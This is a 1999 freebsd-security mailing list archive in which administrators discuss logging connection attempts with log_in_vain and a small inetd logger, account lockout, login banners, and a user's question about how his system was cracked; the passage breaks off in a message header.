FreeBSD.org On Tue, May 25, 1999 at 02:14:06PM +1000, Warren Toomey wrote: > The sysctl net.inet.udp.log_in_vain option seems to be the one. > Maybe it doesn't log the contents, just some of the headers. > I haven't used it yet. > Last time I used this option (2.2.8-RELEASE), it only logged the packet headers to syslog. Something like this: Connection attempt to UDP x.x.x.x:port from y.y.y.y:port theres also a tunable net.inet.tcp.log_in_vain which does the same thing for TCP packets. enjoy -- Jason Garman http://wedgie.org/ Student, University of Maryland garman@earthling.net Story of the week: Whois: JAG145 http://www.theonion.com/onion3518/telemarketing_sale.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 22:39:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 0801514DF1 for ; Mon, 24 May 1999 22:39:20 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA11926; Mon, 24 May 1999 23:39:09 -0600 (MDT) Message-Id: <4.2.0.37.19990524233825.00c03bd0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Mon, 24 May 1999 23:39:04 -0600 To: wkt@cs.adfa.edu.au, freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: TCP connect data logger In-Reply-To: <199905250213.MAA02815@henry.cs.adfa.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That really sucks! But in a good way. ;-) I'd like to see it as a package. --Brett Glass At 12:13 PM 5/25/99 +1000, Warren Toomey wrote: >This is strictly off-topic for FreeBSD, but anyway ... A few people desired >to know why someone was attacking port X on their box. Ages ago, I wrote a >small program, tcpsuck, that is run from inetd. Tcpsuck sits on a port and >logs the data coming in. It stops after a pre-defined timeout, or when the >remote end break the connection. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 22:46:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 912AB14E31 for ; Mon, 24 May 1999 22:46:23 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id PAA03512 for security@freebsd.org; Tue, 25 May 1999 15:46:23 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199905250546.PAA03512@henry.cs.adfa.edu.au> Subject: Re: TCP connect data logger In-Reply-To: <4.2.0.37.19990524233825.00c03bd0@localhost> from Brett Glass at "May 24, 1999 11:39: 4 pm" To: security@freebsd.org Date: Tue, 25 May 1999 15:46:23 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Brett Glass: > That really sucks! But in a good way. ;-) I'd like to see it as a package. Well, compiling is pretty easy. You obviously have to modify inetd.conf manually. Is it really worth making it a package, given the extent of the manual configuration? I'd probably prefer a port. Suggestions? Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 25 1: 7: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from volodya.prime.net.ua (volodya.prime.net.ua [195.64.229.17]) by hub.freebsd.org (Postfix) with ESMTP id C1675155E7 for ; Tue, 25 May 1999 01:06:56 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost [127.0.0.1]) by volodya.prime.net.ua (8.9.3/8.8.8) with ESMTP id AAA11330 for ; Tue, 25 May 1999 00:48:08 +0300 (EEST) (envelope-from andyo@prime.net.ua) Message-ID: <3749C917.F7407C39@prime.net.ua> Date: Tue, 25 May 1999 00:48:07 +0300 From: "Andy V. Oleynik" Organization: M-Info X-Mailer: Mozilla 4.6 [en] (X11; I; FreeBSD 3.2-BETA i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> <199905241603.KAA11763@mt.sri.com> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I dont know about current. But in 3.2-S if traceroute doesnt UDP then its man page is compleetly inadequat. It say traceroute does UDP! Dag-Erling Smorgrav wrote: > Nate Williams writes: > > > "Bert Kellerman" writes: > > > > You need UDP connectivity to perform a successful traceroute from a UNIX > > > > client..not TCP. [...] > > > Bullshit. RTFM. > > DES, you don't know what you're talking about. A ping doesn't require > > UDP, but traceroute certainly coes. > > No it does not. At least not in -current. > > DES > -- > Dag-Erling Smorgrav - des@flood.ping.uio.no > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- WBW Andy V. Oleynik (When U work in virtual office U have good chance to obtain virtual money ö%-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 26 9:31:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from kaa.kfunigraz.ac.at (KAA16.kfunigraz.ac.at [143.50.16.17]) by hub.freebsd.org (Postfix) with ESMTP id D37ED15601 for ; Wed, 26 May 1999 09:31:15 -0700 (PDT) (envelope-from dada@balu.kfunigraz.ac.at) Received: from balu.kfunigraz.ac.at (balu [143.50.16.16]) by kaa.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id SAA15111 for ; Wed, 26 May 1999 18:30:33 +0200 (MDT) Received: from localhost.kfunigraz.ac.at (IDENT:L7jsz3pAXabCCNDJ4Ud1DYPyv9psnGSG@BONLINE15.kfunigraz.ac.at [143.50.169.15]) by balu.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id SAA14279 for ; Wed, 26 May 1999 18:31:05 +0200 (MDT) Received: from localhost (hnZPB4S1Xe1ihcBBPxlijOToMRjgAt+k@localhost.kfunigraz.ac.at [127.0.0.1]) by localhost.kfunigraz.ac.at (8.8.8/x.y.z) with SMTP id OAA08687 for ; Wed, 26 May 1999 14:05:14 +0200 (CEST) (envelope-from dada@localhost.kfunigraz.ac.at) Date: Wed, 26 May 1999 14:05:14 +0200 (CEST) From: Martin Kammerhofer Reply-To: Martin Kammerhofer To: security@FreeBSD.ORG Subject: Re: TCP connect data logger In-Reply-To: <19990525012032.A25197@fw.garman.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 25 May 1999, Jason Garman wrote: > Last time I used this option (2.2.8-RELEASE), it only logged the packet > headers to syslog. Something like this: > > Connection attempt to UDP x.x.x.x:port from y.y.y.y:port > > theres also a tunable net.inet.tcp.log_in_vain which does the same thing > for TCP packets. > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. Enabling them can generate huge amounts of LOG_INFO messages during port scans. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 0:25:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 512FE15777 for ; Thu, 27 May 1999 00:25:08 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.00 #1) id 10muX0-000Ge2-00; Thu, 27 May 1999 09:24:46 +0200 From: Sheldon Hearn To: Martin Kammerhofer Cc: security@FreeBSD.ORG Subject: Re: TCP connect data logger In-reply-to: Your message of "Wed, 26 May 1999 14:05:14 +0200." Date: Thu, 27 May 1999 09:24:46 +0200 Message-ID: <63985.927789886@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 26 May 1999 14:05:14 +0200, Martin Kammerhofer wrote: > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. > Enabling them can generate huge amounts of LOG_INFO messages during > port scans. That's why they're only really useful if syslog writing their output away from sensitive filesystems like /var. There's a lot of material in the archives of this list regarding suitable alternatives (printers, remote syslogd's, dedicated filesystems etc.) so there's no need for us to rehash that now. :-) If I remember correctly, it takes a source hack to get the messages out of the mainstream on a LOG_LOCAL? facility. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 1: 6:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from kaa.kfunigraz.ac.at (KAA16.kfunigraz.ac.at [143.50.16.17]) by hub.freebsd.org (Postfix) with ESMTP id E5AAB14E9D for ; Thu, 27 May 1999 01:06:32 -0700 (PDT) (envelope-from dada@balu.kfunigraz.ac.at) Received: from balu.kfunigraz.ac.at (balu [143.50.16.16]) by kaa.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id KAA24336 for ; Thu, 27 May 1999 10:05:48 +0200 (MDT) Received: from localhost.kfunigraz.ac.at (IDENT:en7LWWnBqz5Du2Wj0NV9fa5snU2mqp73@BONLINEA51.kfunigraz.ac.at [143.50.36.51]) by balu.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id KAA14302 for ; Thu, 27 May 1999 10:06:20 +0200 (MDT) Received: from localhost (i6zwjG/LSCuW/83cYGbKp6y5IkpNEFPi@localhost.kfunigraz.ac.at [127.0.0.1]) by localhost.kfunigraz.ac.at (8.8.8/x.y.z) with SMTP id KAA00491 for ; Thu, 27 May 1999 10:00:38 +0200 (CEST) (envelope-from dada@localhost.kfunigraz.ac.at) Date: Thu, 27 May 1999 10:00:38 +0200 (CEST) From: Martin Kammerhofer Reply-To: Martin Kammerhofer To: security@FreeBSD.ORG Subject: Re: TCP connect data logger In-Reply-To: <63985.927789886@axl.noc.iafrica.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 May 1999, Sheldon Hearn wrote: > On Wed, 26 May 1999 14:05:14 +0200, Martin Kammerhofer wrote: > > > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. > > Enabling them can generate huge amounts of LOG_INFO messages during > > port scans. > > That's why they're only really useful if syslog writing their output > away from sensitive filesystems like /var. > > There's a lot of material in the archives of this list regarding > suitable alternatives (printers, remote syslogd's, dedicated filesystems > etc.) so there's no need for us to rehash that now. :-) > You are suggesting the choice of redirecting the disk filling service? This sounds to me like exporting toxic waste to preserve the environment. There is a need for rate limiting and it should be implemented. It can be done in a few LOC. Regards, Martin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 5:27:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from hawk.gnome.co.uk (gnome.gw.cerbernet.net [193.243.224.22]) by hub.freebsd.org (Postfix) with ESMTP id CE8D914FCC for ; Thu, 27 May 1999 05:27:10 -0700 (PDT) (envelope-from jacs@hawk.gnome.co.uk) Received: from hawk.gnome.co.uk (localhost [127.0.0.1]) by hawk.gnome.co.uk (8.9.3/8.9.3) with ESMTP id NAA09689 for ; Thu, 27 May 1999 13:27:07 +0100 (BST) (envelope-from jacs@hawk.gnome.co.uk) Message-Id: <199905271227.NAA09689@hawk.gnome.co.uk> X-Mailer: exmh version 2.0.2 2/24/98 To: security@freebsd.org Subject: masqueraded attacks Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 27 May 1999 13:27:03 +0100 From: Chris Stenton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have had a couple of attempted attacks from a masqueraded host. Is there any way to get ipfw to give the "route via" info from the attacking data stream? Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 10:50:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 0209914F99 for ; Thu, 27 May 1999 10:50:31 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id KAA21704; Thu, 27 May 1999 10:49:45 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id KAA25452; Thu, 27 May 1999 10:49:45 -0700 Received: from softweyr.com (dyn2.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA27431; Thu, 27 May 99 10:49:39 PDT Message-Id: <374D85B2.2C12599@softweyr.com> Date: Thu, 27 May 1999 11:49:38 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Martin Kammerhofer Cc: security@FreeBSD.ORG Subject: Re: TCP connect data logger References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Martin Kammerhofer wrote: > > You are suggesting the choice of redirecting the disk filling service? > This sounds to me like exporting toxic waste to preserve the environment. Hey, a new FreeBSD business opportunity! Syslog servers in remote locations! Anybody know a VC or two? I'll run the server in Tahiti! ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 19:10:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 6A26414CAC for ; Thu, 27 May 1999 19:10:18 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id MAA04449 for ; Fri, 28 May 1999 12:10:28 +1000 Date: Fri, 28 May 1999 12:10:27 +1000 (EST) From: Nicholas Brawn To: freebsd-security@freebsd.org Subject: Locking out accounts after repeated failures Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm interested to know if freebsd has the capability to lock out users after 5 consecutive bad login attempts, with the "counter" being cleared after each successful login. If it is capable, could someone please point me to the right documentation/files. Cheers, Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 19:40:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 7BE9D15146 for ; Thu, 27 May 1999 19:40:31 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id MAA06545; Fri, 28 May 1999 12:40:35 +1000 Date: Fri, 28 May 1999 12:40:35 +1000 (EST) From: Nicholas Brawn To: "Brian W. Buchanan" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Locking out accounts after repeated failures In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes. I'm interested in doing it on a bastion host and servers connected to public networks (ie, Internet). Of course the root account would not be locked out, but then you couldn't log in as root except at console. Nick On Thu, 27 May 1999, Brian W. Buchanan wrote: > On Fri, 28 May 1999, Nicholas Brawn wrote: > > > I'm interested to know if freebsd has the capability to lock out users > > after 5 consecutive bad login attempts, with the "counter" being cleared > > after each successful login. If it is capable, could someone please point > > me to the right documentation/files. > > Are you sure you want to do this? This leads to a very obvious denial of > service attack. > > -- > Brian Buchanan brian@CSUA.Berkeley.EDU > -------------------------------------------------------------------------- > FreeBSD - The Power to Serve! http://www.freebsd.org > > daemon(n): 1. an attendant power or spirit : GENIUS > 2. the cute little mascot of the FreeBSD operating system > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 22: 0:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id BEC0014C80 for ; Thu, 27 May 1999 22:00:48 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id PAA13388 for ; Fri, 28 May 1999 15:00:59 +1000 Date: Fri, 28 May 1999 15:00:58 +1000 (EST) From: Nicholas Brawn To: freebsd-security@freebsd.org Subject: legal notice for telnet/etc Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Which is the correct file to edit to display a legal notice prior to a user logging in? I'm thinking of tlenet primarily at this stage. Cheers, Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 22: 5:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from toto.oz-online.net (toto.oz-online.net [208.149.58.2]) by hub.freebsd.org (Postfix) with SMTP id 6325014C80 for ; Thu, 27 May 1999 22:05:18 -0700 (PDT) (envelope-from chriss@toto.oz-online.net) Received: (qmail 9698 invoked by uid 6819); 28 May 1999 05:12:19 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 28 May 1999 05:12:19 -0000 Date: Fri, 28 May 1999 00:12:19 -0500 (CWT) From: Chriss To: Nicholas Brawn Cc: freebsd-security@freebsd.org Subject: Re: legal notice for telnet/etc In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org NOTES By default telnetd will read the he, hn, and im capabilities from /etc/gettytab and use that information (if present) to determine what to display before the login: prompt. You can also use a System V style /etc/issue file by using the if capability, which will override im. The information specified in either im or if will be displayed to both con-sole and remote logins. On Fri, 28 May 1999, Nicholas Brawn wrote: > Which is the correct file to edit to display a legal notice prior to a > user logging in? I'm thinking of tlenet primarily at this stage. > > Cheers, > Nick > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 22:15: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from arpa.com (rage.arpa.com [199.245.173.3]) by hub.freebsd.org (Postfix) with ESMTP id A2DCD14DBF for ; Thu, 27 May 1999 22:15:07 -0700 (PDT) (envelope-from jamie@arpa.com) Received: (from jamie@localhost) by arpa.com (8.9.3/8.9.3) id AAA29338; Fri, 28 May 1999 00:14:36 -0500 (CDT) Date: Fri, 28 May 1999 00:14:36 -0500 From: Jamie Rishaw To: Chriss Cc: Nicholas Brawn , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc Message-ID: <19990528001436.C28844@rage.arpa.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from Chriss on Fri, May 28, 1999 at 12:12:19AM -0500 X-No-Archive: Yes X-Face: d=) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Note, that doesnt work for ssh. I use /etc/COPYRIGHT for all my must-read's. The only problem is, that's post-login. You can define copyright file in /etc/login.conf ":copyright=" directive. -jamie On Fri, May 28, 1999 at 12:12:19AM -0500, Chriss wrote: > > > > NOTES > By default telnetd will read the he, hn, and im capabilities from > /etc/gettytab and use that information (if present) to determine what > to display before the login: prompt. You can also use a System V > style /etc/issue file by using the if capability, which will override > im. The information specified in either im or if will be displayed to > both con-sole and remote logins. > > > On Fri, 28 May 1999, Nicholas Brawn wrote: > > > Which is the correct file to edit to display a legal notice prior to a > > user logging in? I'm thinking of tlenet primarily at this stage. > > > > Cheers, > > Nick > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- jamie rishaw a friend in need is a friend indeed, but a friend with weed is better. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 22:44:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from ionet.net (mail.ionet.net [206.41.128.16]) by hub.freebsd.org (Postfix) with ESMTP id 7AC82152D1 for ; Thu, 27 May 1999 22:44:39 -0700 (PDT) (envelope-from micheal@ionet.net) Received: from nt (dredster.ionet.net [38.193.50.179]) by ionet.net (8.9.1a/8.9.1) with SMTP id AAA29946; Fri, 28 May 1999 00:47:26 -0500 (CDT) Message-ID: <000f01bea8cd$28dd8200$0201a8c0@dredster.ionet.net> From: "Micheal Patterson" To: "Nicholas Brawn" , References: Subject: Re: legal notice for telnet/etc Date: Fri, 28 May 1999 00:40:52 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you're running tcp wrappers, you can use the banner file option. For more information, check out the man page on hosts_options and also check out the Banners.Makefile that comes with the tcp_wrappers port. I believe this will do what you're wanting to do. Micheal Patterson micheal@ionet.net ----- Original Message ----- From: Nicholas Brawn To: Sent: Friday, May 28, 1999 12:00 AM Subject: legal notice for telnet/etc > Which is the correct file to edit to display a legal notice prior to a > user logging in? I'm thinking of tlenet primarily at this stage. > > Cheers, > Nick > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 2:26:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from nic.mmc.net.ge (nic.mmc.net.ge [212.72.145.2]) by hub.freebsd.org (Postfix) with ESMTP id EED2A14F84 for ; Fri, 28 May 1999 02:26:33 -0700 (PDT) (envelope-from dima@nic.mmc.net.ge) Received: (from dima@localhost) by nic.mmc.net.ge (8.9.2/8.8.5) id OAA08009 for security@FreeBSD.org; Fri, 28 May 1999 14:27:23 +0500 (GET) Date: Fri, 28 May 1999 14:27:23 +0500 (GET) From: Dima Message-Id: <199905280927.OAA08009@nic.mmc.net.ge> To: security@FreeBSD.org Subject: System beeing cracked! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I have 3.1 installed and friend of mine made a bet that he can hack into my system. He has ordinary account opened. So, he win! And i'am wondering if there are any security holes in 3.1? He login as himself via telnet, then he made him root (but he was not in wheel group and ofcourse did not know root password) and what is more interesting he cracked several password. He made all this in 2 houres, and password was minimal 10 symbols lenght, containg different case and digits. I am using MD5 codding, and as I knew it is impossible. Has someone any idea how it was done? Please, answer me, as my friend do not tell me anything about this as he feel like guru-hacker. Thank you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 2:32:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 5ED8D15094 for ; Fri, 28 May 1999 02:32:20 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id CAA16448; Fri, 28 May 1999 02:31:39 -0700 (PDT) Message-ID: <19990528023139.A15594@best.com> Date: Fri, 28 May 1999 02:31:39 -0700 From: "Jan B. Koum " To: Martin Kammerhofer , security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990525012032.A25197@fw.garman.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Martin Kammerhofer on Wed, May 26, 1999 at 02:05:14PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 26, 1999 at 02:05:14PM +0200, Martin Kammerhofer wrote: > On Tue, 25 May 1999, Jason Garman wrote: > > > Last time I used this option (2.2.8-RELEASE), it only logged the packet > > headers to syslog. Something like this: > > > > Connection attempt to UDP x.x.x.x:port from y.y.y.y:port > > > > theres also a tunable net.inet.tcp.log_in_vain which does the same thing > > for TCP packets. > > > > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. > Enabling them can generate huge amounts of LOG_INFO messages during > port scans. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message You should also note that net.inet.tcp.log_in_vain will ONLY log packets which have SYN bit set. That sucks if you get port scanned by something like nmap which can use FIN scan for example. (Or some other stealth scanning technique). -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 2:44: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 8253514F84 for ; Fri, 28 May 1999 02:44:01 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id NAA21987; Fri, 28 May 1999 13:43:51 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 28 May 1999 13:43:08 +0400 Received: from undisclosed-intranet-sender id xma026984; Fri, 28 May 99 13:43:06 +0400 Date: Fri, 28 May 1999 13:42:56 +0400 Message-Id: <199905280942.NAA13537@paranoid.eltex.spb.ru> In-Reply-To: <19990528023139.A15594@best.com> from ""Jan B. Koum " " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: TCP connect data logger To: jkb@best.com Cc: dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, I remember a patch was posted here to log all TCP packets that are not part of some known sequence. Really simple thing. "Jan B. Koum " said : > On Wed, May 26, 1999 at 02:05:14PM +0200, Martin Kammerhofer wrote: > > On Tue, 25 May 1999, Jason Garman wrote: > > > > > Last time I used this option (2.2.8-RELEASE), it only logged the packet > > > headers to syslog. Something like this: > > > > > > Connection attempt to UDP x.x.x.x:port from y.y.y.y:port > > > > > > theres also a tunable net.inet.tcp.log_in_vain which does the same thing > > > for TCP packets. > > > > > > > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. > > Enabling them can generate huge amounts of LOG_INFO messages during > > port scans. > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > You should also note that net.inet.tcp.log_in_vain will ONLY log > packets which have SYN bit set. That sucks if you get port scanned by > something like nmap which can use FIN scan for example. (Or some other > stealth scanning technique). _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN05lHaH/mIJW9LeBAQGPRAP/Ro2/SqP5ELJDyGEMREfypU27m6P28iex 6T4axzhfcW4JRm4/9rIyVbBDxFWv5P42sPKWXXHptZZcqdy73zVjLTI1qrJ1vBek /pu8cNChP1uvx3NT1ydduWImXwqmbHb+bqd9XYgYoXNy32h5oVa9ppKzOkuU9yUO ZFxxtlamiH4= =uV6A -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 2:48:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 7CBB914F84 for ; Fri, 28 May 1999 02:48:24 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id CAA18283; Fri, 28 May 